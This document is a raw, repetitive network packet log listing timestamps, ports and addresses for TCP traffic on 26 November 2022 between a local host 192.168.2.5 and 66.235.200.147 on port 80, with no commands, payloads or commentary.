Nov 26, 2022 11:17:42.569082022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569102049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569226027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569246054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569266081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569283962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569302082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569303989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569319963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569320917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569339037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569345951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569358110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569374084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569375992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569394112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569401979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569413900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569432974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569432974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569447041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569451094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569469929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569475889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569489002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569494009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569508076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569518089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569525003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569535971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569541931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569551945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569561958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569571018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569581032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569587946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569600105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569617987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569617987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569637060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569639921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569657087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569665909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569675922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569685936 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569694042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569705963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569705963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569714069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569719076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569731951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569736004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569751024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569752932 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569768906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569772005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569789886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569791079 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569807053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569809914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569828033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569844007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569871902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569875002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569890022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569909096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569927931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569931984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569946051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569957018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569964886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.569979906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.569983959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570003033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570007086 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570020914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570034981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570046902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570065022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570156097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570211887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570230961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570272923 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570291042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570297956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570453882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570472002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570491076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570504904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570525885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570547104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570547104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570585012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570604086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570616007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570621967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570640087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570641994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570677042 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570712090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570725918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570744991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570771933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570804119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570822954 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570839882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570863008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570887089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570909977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.570914984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570935011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570949078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570966005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570980072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.570993900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571007967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571017027 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571023941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571043015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571055889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571075916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571083069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571094990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571114063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571115017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571131945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571131945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571147919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571152925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571171999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571176052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571191072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571197033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571258068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571319103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571410894 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571639061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571659088 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571676016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571693897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571715117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571719885 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571733952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571742058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571753025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571753025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571773052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571785927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571793079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571799994 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571813107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571816921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571832895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571835041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571851969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571856976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571867943 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571870089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571887970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571902037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571903944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571916103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.571947098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.571994066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572223902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572251081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572269917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572288036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572299957 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572307110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572324038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572325945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572345972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572352886 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572364092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572376966 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572382927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572401047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572401047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572418928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572423935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572434902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572438002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572457075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572462082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572489023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572510958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.572520018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572554111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572892904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572912931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572956085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572974920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.572993040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573013067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573035002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573055029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573075056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573096037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573112965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573112965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573132038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573152065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573353052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573421955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573441029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573472023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573497057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573515892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573534012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573553085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573558092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573573112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573584080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573590994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573610067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573617935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573630095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573658943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573678970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573688984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573693037 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573712111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573719025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573730946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573736906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573749065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573761940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573766947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573786020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573807001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573810101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573826075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573844910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573858976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573863983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573884010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.573884964 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.573923111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577096939 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577117920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577136040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577156067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577173948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577189922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577214003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577231884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577234983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577249050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577267885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577275991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577276945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577285051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577303886 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577307940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577323914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577327013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577342033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577359915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577368021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577368021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577378035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577397108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577398062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577415943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577435017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577455044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577459097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577474117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577476978 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577491999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577512026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577529907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577547073 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577549934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577565908 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577569008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577584028 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577593088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577603102 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577610970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577621937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577640057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577656984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577666044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577666044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577676058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577694893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577697992 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577713013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577729940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577745914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577749014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577769041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577788115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577804089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577805996 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577822924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577825069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577843904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577862024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577879906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577896118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577898026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577897072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577917099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577930927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577935934 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577955008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577971935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.577982903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.577991962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578010082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578015089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578027964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578030109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578046083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578064919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578083038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578087091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578102112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578119993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578135967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578155994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578170061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578190088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578202009 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578217983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578250885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578253031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578269005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578316927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578335047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578352928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578361988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578371048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578389883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578397989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.578408957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.578428030 CET	80	49707	66.235.200.147	192.168.2.5
